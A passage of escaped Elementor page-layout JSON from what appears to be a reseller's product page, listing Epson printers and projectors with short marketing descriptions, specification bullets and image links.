]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"7bcc969\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"561cb4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2432 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><p><br \\/>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11bfc36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":\"12\",\"bottom\":\"12\",\"left\":\"12\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4af8eba\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2055<\\/strong><\\/h4><p><img class=\\\"wp-image-2434 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"646b12f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"12\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"19\",\"bottom\":\"19\",\"left\":\"19\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2142W<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/h4>\\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\\n<ul>\\n \\t<li>White and Colour Brightness at 4,200lm<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>12000 hours lamp life in eco-mode<\\/li>\\n \\t<li>MHL-enabled<\\/li>\\n \\t<li>Multi-PC Projection<\\/li>\\n \\t<li>Horizontal Keystone Slider<\\/li>\\n \\t<li>Miracast<sup>\\u00ae<\\/sup><\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><\\/center>\\n<\\/span><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L500W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/>\\n\\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\\n<ul>\\n \\t<li>5,000 lumens colour\\/white 